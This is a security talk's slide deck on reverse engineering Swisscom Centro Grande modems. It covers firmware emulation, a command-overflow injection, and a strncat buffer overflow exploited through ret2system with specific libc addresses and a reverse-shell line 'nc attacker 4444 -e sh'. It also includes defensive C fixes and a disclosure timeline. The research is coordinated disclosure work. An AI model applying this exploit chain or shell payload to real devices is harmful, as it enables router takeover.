Reverse engineering Swisscom's Centro Grande Modem
1. Reverse engineering Swisscom's Centro Grande modems
Alain Mowat & Thomas Imbert
2. whoami
› Alain Mowat (@plopz0r)
› Head of Audit division at SCRT
› Pentest
› Code review
› Trainings
› Mostly a Web App guy
› Member of 0daysober CTF team
› Watch other people exploiting cool vulns
3. Background
› Why look into the Swisscom modems?
› Why this talk?
› I don’t actually own a Swisscom modem
› Made it a bit harder to study...
5. Attack Surface
› ADB# show processes
256 0 2040 S logd
259 0 1308 S klogd -c3
271 0 832 S ec
343 0 3236 S cm
350 0 0 SW [dsl0]
363 0 0 SW [bcmsw]
364 0 0 SW [bcmsw_timer]
365 0 0 SW< [linkwatch]
5889 0 1132 S dropbear -P /tmp/dropbear-local.pid -l 20 -p 192.168
6227 0 1312 S telnetd Local -u 20 -b 192.168.1.1:23 -I 300
6898 65534 2292 S nhttpd -c /tmp/nhttpd.conf
7362 0 1000 S dhcps /tmp/dhcps.conf
7910 0 764 S dns
8014 0 1088 S miniupnpd -i ptm0 -a 192.168.1.1 -N -I 4
8026 0 736 S /bin/wpspbc
8223 0 2676 S /usr/sbin/hostapd -B /tmp/wlan/config/hostapd.conf
9164 0 1664 S /bin/sh /etc/rc.common /etc/rc.d/S11services.sh boot
9177 0 2940 S cwmp
9204 0 1316 S /bin/sh /etc/ah/printk_dump.sh
9353 0 884 S ec
9553 0 1312 S /bin/sh /etc/ah/procSentinel.sh cm 300
11846 0 1332 S /bin/sh DHCPv4Client.sh
11848 0 1320 S udhcpc -S -R -f -W rgH7sqo?h@5Y -t 500000 -T 4 -o -C
14753 0 792 S igmpproxy -c /tmp/igmpproxy.conf -p /tmp/igmpproxy.p
15287 0 3576 S voip
15688 0 740 S tproxyd 80 8080 1 192.168.1.1 /ui/swc/parentalcontro
15923 0 1056 S N chronyd -f /tmp/chrony.conf
16770 0 820 S radvd
16812 0 2036 S dibbler-server start
6. Finding the firmware
› Locate the firmware
› https://www.swisscom.ch/en/residential/help/device/internet-router/centro-grande.html
› Vx226x1_61400.sig
› Version at the time
› 6.14.00
8. CPE WAN Management Protocol
› Also known as TR-069
› Protocol that defines how to manage "Customer Premises Equipment"
› cwmp binary
› Listens to 0.0.0.0:7547
› iptables rule allows access only from certain Swisscom subnets
9. Web interface
› Web server is nhttpd (http://www.nazgul.ch/dev_nostromo.html)
› If a binary file is accessed through the web interface, the server executes it
› Directory traversal → code execution in version 1.9.3
11. Emulating the device
› OpenWRT (https://openwrt.org/)
› Linux distribution for embedded devices
› Qemu (http://wiki.qemu.org/Main_Page)
› Machine emulator and virtualizer
12. Configuring OpenWRT
› make menuconfig
› MIPS target
› Add all debugging and networking tools
› Cross-compile nhttpd
› Generate ramdisk
› Copy Swisscom firmware files to the image
› Run image with qemu
› qemu-system-mips -kernel openwrt-malta-be-vmlinux-initramfs.elf -net tap -net nic -nographic -m 2048
13. Setting up the image
› nhttpd server
serverroot /www
serveradmin webmaster@adbglobal.com
servermimes conf/mimes
docroot /www/htdocs
docindex lanhosts
logpid /tmp/logs
user nobody
disablehttp 0
notfound 501
sslport 443
sslcert /etc/certs/server.crt
sslcertkey /etc/certs/server.key
sslcertca /etc/certs/ca.pem
sslcertreq *
serverlisten 0.0.0.0
servername localhost
17. Configuration manager
› Used to view and modify the device’s configuration
› Bound to localhost:9034
› Also /tmp/cmctl socket
› Several possible commands
› GETO, GETV, …
› SET, SETM, …
› RESET, REBOOT, ...
› DUMP, EXPORT, ...
21. Finalizing the image setup
udhcpc -i br-lan
cm
touch /tmp/cmctl
chmod 777 /tmp/cmctl
nhttpd -c /www/nhttpd.cfg
nc localhost 9034
DOM Device /etc/cm/tr181/dom/
DOM InternetGatewayDevice /etc/cm/tr098/dom/
CONF /etc/cm/conf/
ADD InternetGatewayDevice.WANDevice
ADD InternetGatewayDevice.WANDevice.1.WANConnectionDevice
ADD InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection
SET Device.IP.Interface.1.IPv4Address.1.X_ADB_TR098Reference
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1
SET Device.ManagementServer.X_ADB_ConnectionRequestInterface Device.IP.Interface.1
SET Device.IP.Interface.1.Status Up
SET Device.Ethernet.Link.1.Name br-lan
SET Device.DeviceInfo.SerialNumber 123456
SET Device.IP.Interface.1.X_ADB_Upstream true
SET Device.IP.Interface.1.X_ADB_TR098Reference
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1
23. Configuration manager
› Special syntax
› Similar to SQL in certain ways
› SELECT =~ GETV
› UPDATE =~ SET
› Conditions
› GETO A.B.C.[Test=1]
› GETO A.B.C.[Test~1]
› GETO A.B.C.[Test!1]
24. Vulnerability #1: Command overflow
› Each call to recv is treated as a new command
› By sending more than 16384 characters, we can craft a new configuration command
› Logging in to the web interface generates a call to the configuration manager that looks like this
› GETO Users.User.[Username=ATTACKER_CONTROLLED]
› By providing a long username, we can exceed the 16348 limit and generate a new request within the configuration manager
› Allows complete control over the device
› Change passwords
› Allow remote access
› ...
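The root cause above is framing: the configuration manager treats each recv() as one command, so an over-long username spills into a second command. The added example below (written for this page, not code from the Centro firmware or from SCRT) shows the two defensive fixes: frame commands on a newline terminator with the over-long line rejected as a whole, and build the GETO query only from usernames that cannot change its structure. CM_MAX_CMD and the function names are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define CM_MAX_CMD 16384   /* command size limit quoted on the slides (assumed name) */

enum cm_frame { CM_FRAME_OK, CM_FRAME_NEED_MORE, CM_FRAME_TOO_LONG };

/*
 * Hardened framing: a command ends at '\n', never at a recv() boundary.
 * On CM_FRAME_OK the NUL-terminated command is in out and *consumed holds
 * the bytes to drop from the stream. A line that does not fit is rejected
 * whole instead of being split into a valid prefix plus a second command.
 */
enum cm_frame cm_frame_command(const char *buf, size_t len, char *out,
                               size_t outsz, size_t *consumed)
{
    const char *nl = memchr(buf, '\n', len);
    if (nl == NULL) {
        /* No terminator yet: keep buffering unless the line is already too long. */
        return len >= CM_MAX_CMD ? CM_FRAME_TOO_LONG : CM_FRAME_NEED_MORE;
    }
    size_t cmdlen = (size_t)(nl - buf);
    *consumed = cmdlen + 1;
    if (cmdlen >= CM_MAX_CMD || cmdlen >= outsz)
        return CM_FRAME_TOO_LONG;
    memcpy(out, buf, cmdlen);
    out[cmdlen] = '\0';
    return CM_FRAME_OK;
}

/*
 * Build "GETO Users.User.[Username=<name>]" only when the name cannot alter
 * the query: no line breaks, no brackets, none of the condition operators
 * (= ~ !) shown on the slides, and the finished command stays below the limit.
 * Returns 0 on success, -1 when the username is rejected.
 */
int cm_build_user_query(const char *username, char *out, size_t outsz)
{
    static const char prefix[] = "GETO Users.User.[Username=";
    if (strpbrk(username, "\r\n[]=~!") != NULL)
        return -1;
    size_t need = sizeof(prefix) - 1 + strlen(username) + 2; /* "]" plus NUL */
    if (need > CM_MAX_CMD || need > outsz)
        return -1;
    snprintf(out, outsz, "%s%s]", prefix, username);
    return 0;
}
```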
29. Vulnerability #3: Buffer overflow(s)
› Buffer overflow when parsing the name of XML files while performing certain commands (CONF, DOM, …)
› Requirements
› Arbitrarily-named XML file on the device
› file and folder are each limited to 4096 in size, but their concatenation is not
parseFilesInFolder(folder):
    char path[4096];
    files = scandir(folder)
    for file in files:
        if file ends with ".xml":
            strncat(path, folder, 4096)   // the size argument caps what is appended, not the buffer
            strncat(path, file, 4096)     // a second 4096-byte append can push path to 8192 bytes
            parseFile(path)
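The defect in the pseudocode above is that strncat's size argument limits what is appended, not what fits in the destination, so two appends of up to 4096 bytes each can write far past a 4096-byte buffer. The added example below (written for this page, not the configuration manager's code) shows the bounded replacement a fix would use: snprintf reports the full length it wanted, and any path that does not fit is refused instead of being handed to the parser. Names and the 4096 constant's identifier are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define CM_PATH_BUF 4096   /* buffer size used by the vulnerable routine (assumed name) */

/*
 * Join folder and file into out with a single bounded write.
 * Returns 0 on success, -1 when the result would not fit; on failure out is
 * left empty so a truncated path can never reach the XML parser.
 */
int build_xml_path(const char *folder, const char *file, char *out, size_t outsz)
{
    /* Add a separator only when the folder does not already end with one. */
    size_t flen = strlen(folder);
    const char *sep = (flen > 0 && folder[flen - 1] == '/') ? "" : "/";

    int n = snprintf(out, outsz, "%s%s%s", folder, sep, file);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Accept only plain file names ending in ".xml" with no directory component. */
int is_xml_name(const char *file)
{
    size_t len = strlen(file);
    if (len < 5 || strchr(file, '/') != NULL)
        return 0;
    return strcmp(file + len - 4, ".xml") == 0;
}
```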
30. Exploit #3: Creating the XML file
› The PATHSAVE command takes 2 arguments
› An XML filename
› Property that needs to be saved
› PATHSAVE /tmp/test.xml Users.User.1.Password
› Can use this to write an arbitrarily-named file on the device
› The overflow can then be triggered by prepending the folder with lots of /
› CONF /////////////////////////////////////[…]/tmp/exploit.xml
31. Exploit #3: Exploiting a MIPS binary
› [figure: MIPS function prologue and epilogue]
32. Exploit #3: Exploiting a MIPS binary
› No ASLR on the device
› No NX
› No canaries
› A version of nc with the -e switch is present on the device
› Try to call system('nc attacker 4444 -e sh')
› Arguments are not passed on the stack, though, but in registers
› $a0
› $a1
› …
33. Exploit #3: ret2system
› Quick analysis gives the address of system in libuClibc (Centro Business):
› libuClibc base: 0x2aaf8000
› system is at offset: 0x54610
› Real address: 0x2ab4c610
› Need a gadget in order to get our argument to system in $a0
› Make $a0 point to address in the stack
› $s0 is also under our control
36. Disclosure timeline
› 9 September 2015 : Initial disclosure to Swisscom
› 10 September 2015 : Vulnerabilities acknowledged by Swisscom
› 11 September 2015 : Vendor notified (ADB)
› 18 September 2015 : Confirmation of vulns & quick fix available
› 24 September 2015 : Test of quick fix
› 29 September 2015 : Contact with ADB
› October 2015 : Rollout of quick fix to all devices
› January 2016 : Status full fix :
› Centro grande : 100 %
› Centro Business 1.0 : 50 %
› Centro Business 2.0 : 100 %
› 13 June 2016: Disclosure
37. Swisscom bounty
› Combination of flaws rewarded with 3'000 CHF
› Donated to the Ligue Vaudoise contre le Cancer
› Swisscom Bug Bounty program is up & running
› Talk is tomorrow afternoon :)
38. Conclusions
› Attackers
› Look into other processes on the modem
› miniupnp
› voip
› Embedded devices are found everywhere nowadays
› Huge attack surface
› Fewer people reverse firmware than hunt for XSS
› Defenders
› Consider 0days in your penetration tests
› Test your defense in depth
› Test your ability to detect breaches